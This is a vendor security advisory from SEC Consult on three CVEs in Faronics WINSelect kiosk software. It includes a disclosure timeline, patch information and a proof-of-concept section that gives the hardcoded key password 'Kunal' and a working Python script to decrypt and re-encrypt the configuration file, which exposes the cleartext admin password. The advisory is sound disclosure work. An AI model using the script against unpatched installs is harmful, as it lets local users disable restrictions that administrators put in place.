Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)

Title

Multiple Vulnerabilities allowing complete bypass

Product

Faronics WINSelect (Standard + Enterprise)

Vulnerable Version

<8.30.xx.903

Fixed Version

8.30.xx.903

CVE Number

CVE-2024-36495, CVE-2024-36496, CVE-2024-36497

Impact

high

Homepage

https://www.faronics.com/products/winselect

Found

01.02.2024

By

Daniel Hirschberger (Office Bochum) | SEC Consult Vulnerability Lab

The product WINSelect from Faronics is used to restrict the possible actions of users on a system and can even be used to implement a Kiosk mode. Due to hardcoded credentials and an unfitting application architecture an attacker could decrypt the configuration file and retrieve the password which is used to configure the software. Thus, an attacker could completely disable the software.

Vendor description

"WINSelect - Allows you to easily control your end-users' Windows Experience without having to deal with GPOs. Need to Prevent Data From Leaving? Whether you're working on classified government files or the secret ingredient
for your famous lasagna, you need to protect your sensitive information from walking out the door.

Faronics WINSelect offers the ability to disable USB ports and disk drives. Now you can relax knowing your secrets won't be exported without your knowledge."

Source: https://www.faronics.com/products/winselect


Business recommendation

The vendor provides a patched version which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.


Vulnerability overview/description

1) Read/Write Permissions for Everyone on Configuration File (CVE-2024-36495)

The application saves its configuration in an encrypted file which "Everyone" has read and write access to.


2) Hardcoded Credentials (CVE-2024-36496)

The configuration file is encrypted with a static key derived from a static five-character password which allows an attacker to decrypt this file.


3) Unhashed Storage of Password (CVE-2024-36497)

The decrypted configuration file contains the password in cleartext which is used to configure WINSelect. It can be used to remove the existing restrictions and disable WINSelect entirely.

By combining these issues any local attacker can disable WINSelect.


Proof of concept

1) Read/Write Permissions for Everyone on Configuration File (CVE-2024-36495)

WINSelect Standard saves its configuration in the following file:

C:\ProgramData\WINSelect\WINSelect.wsd

Every user has read and write permissions on this file by default:

Figure 1: The write permission is no problem as long as WINSelect is running, because it is locked by the process WSEngine.exe.

For WINSelect Enterprise the path for the configuration file is:

C:\ProgramData\Faronics\StorageSpace\WS\WINSelect.wsd

2) Hardcoded Credentials (CVE-2024-36496)

By analyzing the application via the API Monitor tool, we found that the application uses a hardcoded five letter password, hashes it with the outdated and broken MD5 algorithm (no salt) and uses the first five bytes as the key for RC4. The configuration file is then encrypted with these parameters.

Figure 2: After starting WINSelect.exe the MD5 and RC4 algorithms are requested
Figure 3: When the login to the configuration of WINSelect is triggered via CTRL+ALT+SHIFT+F8, the configuration file is decrypted
Figure 4: The hardcoded password "Kunal" is hashed.
Figure 5: Output of the hardcoded password hash
Figure 6: The first five bytes of the hash are used to instantiate a key object.
Figure 7: The configuration is then decrypted with this key.

To simplify this proof of concept the following python script was developed which automatically decrypts an encrypted WINSelect.wsd:

import sys
from binascii import hexlify, unhexlify
import Crypto.Cipher.ARC4
from hashlib import md5

encoded = "Kunal".encode("utf-16le")
hashed = md5(encoded).digest()
key = hashed[:5] + 11 * b'\x00'

# hardcoded key
#key = b'9d62e7dd580000000000000000000000'
#key = unhexlify(key)
#print(key)

def main():
    if sys.argv[1] == "d":
        decrypt(sys.argv[2], sys.argv[3])
    elif sys.argv[1] == "e":
        encrypt(sys.argv[2], sys.argv[3])

def encrypt(file_in, file_out):
    with open(file_in, 'rb') as file:
        data = file.read()

    # Decrypt the data
    text = data.decode("utf-8").encode("utf-16le")
    encrypted = Crypto.Cipher.ARC4.new(key).encrypt(text)

    with open(file_out, 'wb') as file:
        file.write(b'\xff\xfe')
        file.write(encrypted)

def decrypt(file_in, file_out):
    # skip the first 2 bytes and read the beginning
    with open(file_in, 'rb') as file:
        file.seek(2)
        data = file.read()

    # Decrypt the data
    decrypted = Crypto.Cipher.ARC4.new(key).encrypt(data)
    text = decrypted.decode("utf-16le").encode("utf-8")

    with open(file_out, 'wb') as file:
        file.write(text)

if __name__ == "__main__":
    main()

3) Unhashed Storage of Password (CVE-2024-36497)

By decrypting the configuration file, the used password can be extracted at the beginning of the file:

<?xml version="1.0"?>
<KIOSK>
   <SECTIONS>
      <SECTION>
         <SID>194</SID><!--S_ID_ADMIN_PASS-->
            <RULES>
               <RULE>
                  <ID>121</ID><!--R_ID_PROTECTION_ON_OFF-->
                  <ENABLED>1</ENABLED>
               </RULE>
               <RULE>
                  <ID>148</ID><!--R_ID_PROTECTION_ON_OFF_ADMIN-->
                  <ENABLED>1</ENABLED>
               </RULE>
               <RULE>
                  <ID>116</ID><!--R_ID_ADMIN_PASS-->
                  <ENABLED>1</ENABLED>
               <DATA>
                  <PASSWORDSET>0</PASSWORDSET>
                  <ADMINPASSWORD>myadminpw</ADMINPASSWORD>
               </DATA>

Vulnerable / tested versions

The following version has been tested which was the latest version available at the time of the test:

  • 8.22.1112.886

Vendor contact timeline

2024-02-19 Contacting vendor through support@faronics.com and customerservice@faronics.com
2024-02-20 Vendor responds with an email address to which we shall send the advisory.
2024-02-20 Asking for encryption, vendor requests unencrypted communication, submitting advisory.
2024-02-21 Vendor confirms receipt, engaged with product and development teams.
2024-02-27 Vendor introduces additional contact, will coordinate further responses.
2024-03-13 Additional contact apologizes for delayed response, vulnerabilities already discussed internally. Asks for extension of release.
2024-03-14 Extending advisory release to coordinate with patch.
2024-04-10 Vendor has addressed the reported issues in a test build for the standard version, enterprise fixes will be incorporated soon.
2024-04-18 Giving feedback that the issue is still exploitable, proposing a better hash function and random UUID, linking to OWASP password storage cheat sheet.
2024-04-21 Vendor thanks us for the proposed fix, current patch must be released, but working on new version incorporating our feedback.
2024-04-23 Providing further feedback, especially regarding GPU attacks.
2024-05-27 Asking for a status update.
2024-05-29 Vendor's last email got stuck in their mailbox. The latest WINSelect patch was released in early May, now incorporates PBKDF2. Provides release and download URL. Reserving CVE numbers.
2024-06-10 We can confirm that the PBKDF2 is used with SHA256 and 600000 iterations
2024-06-11 Since the hardcoded password for the encryption is not fixed, we ask if this will be addressed as well. Vendor responds that this will be addressed in a future release.
2024-06-24 Coordinated release of security advisory.

Solution

The vendor provides a patched version 8.30.xx.903 since May 2024 which can be downloaded from the following URL:
https://www.faronics.com/document-library/document/download-winselect-standard
 
The vendor provided the following changelog:
https://www.faronics.com/en-uk/document-library/document/winselect-standard-release-notes

 

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

EOF Daniel Hirschberger @2024

 

Interested to work with the experts of SEC Consult? Send us your application

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices

Back